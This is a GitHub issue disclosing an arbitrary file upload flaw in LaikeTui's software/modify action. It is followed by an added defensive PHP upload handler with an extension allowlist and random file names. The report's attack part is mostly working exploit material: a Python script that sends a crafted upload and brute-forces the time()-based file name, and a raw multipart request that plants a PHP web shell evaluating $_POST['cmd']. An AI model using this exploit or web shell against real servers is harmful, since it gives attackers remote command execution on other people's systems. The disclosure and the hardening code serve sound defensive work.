
There is an arbitrary file upload getshell vulnerability in the background

Open S2eTo opened this issue 2 years ago • 0 comments

File Path: LKT/webapp/modules/software/actions/modifyAction.class.php::execute

This method directly splices the extension from the uploaded file name, without any restriction, into the extension of the upload target file, so a .php file can be uploaded to get a shell.


But the file name is not returned to the page; instead, time() is used here to get the current time for the splicing. As long as the brute-forcing works backwards from the current time, under normal circumstances the number of attempts will not exceed three. Below is the script I wrote in Python.


import time
import socket
import requests

host = "192.168.157.130"
port = 80
client = socket.socket()
start = int(time.time())
client.connect((host, port))
file = open("FILE_UPLOAD_HTTP", "rb")
data = file.read()
client.send(data)
client.close()
end = int(time.time())

now = end
coast = end - start


def f(now):
    uri = f"http://{host}:{port}/LKT/zip/123123{now}..php"
    r = requests.get(uri)
    if r.status_code != 404:
        print(uri)
        exit()


time.sleep(1)
# coast = coast if coast > 3 else 3
for i in range(0, coast + 1):
    f(now)
    now = now - 1

print("No!!!")

HTTP

POST /LKT/index.php?module=software&action=modify&name=1 HTTP/1.1
Host: 192.168.157.1
Content-Length: 238
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://192.168.157.1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: admin_mojavi=2h4889d8ov0i77rrl1q15313t6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGTdxAdrEarGLzRWy

------WebKitFormBoundaryGTdxAdrEarGLzRWy
Content-Disposition: form-data; name="edition_url"; filename="123123.php"
Content-Type: image/php

<?php
var_dump($_POST);
@eval($_POST["cmd"]);
?>
------WebKitFormBoundaryGTdxAdrEarGLzRWy

S2eTo, Nov 03 '22 10:11
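A defensive counterpart, added here and not part of LaikeTui's code or of this report: a hypothetical PHP upload handler that replaces the pattern described above (client-controlled extension appended to a time()-based name) with an extension allowlist and an unpredictable file name. The allowlist contents, the target directory and the function names are assumptions.

```php
<?php
// Added example, not LaikeTui's code. Only the vulnerable pattern (client extension
// spliced onto a time()-based name) comes from the report; everything else is assumed.

const ALLOWED_EXTENSIONS = ['zip', 'rar', '7z', 'gz']; // allowlist, never a blocklist
const UPLOAD_DIR = __DIR__ . '/zip';                   // assumed; mirrors the /LKT/zip/ path in the report

/**
 * Return a vetted extension or null. pathinfo() takes only the final extension, so
 * names such as "123123..php" or "a.php.zip" can never yield "php" unless "php" is allowed.
 * The client's Content-Type (e.g. "image/php" in the report) is ignored: it is attacker-controlled.
 */
function safeExtension(string $clientName): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXTENSIONS, true) ? $ext : null;
}

/**
 * Store one entry of $_FILES and return the stored name, or null on rejection.
 * The stored name is random: time() is guessable, which is exactly what the
 * report's script exploits by stepping back a few seconds from "now".
 */
function storeUpload(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;                               // not a file from this request
    }
    $ext = safeExtension((string) $file['name']);
    if ($ext === null) {
        return null;                               // reject; do not try to "repair" the name
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        return null;
    }
    return $name;
}

// Usage in the action: $stored = storeUpload($_FILES['edition_url'] ?? []);
```

Independently of the handler, the upload directory should be served with script execution disabled in the web server configuration, so that even a mis-named file cannot run as PHP.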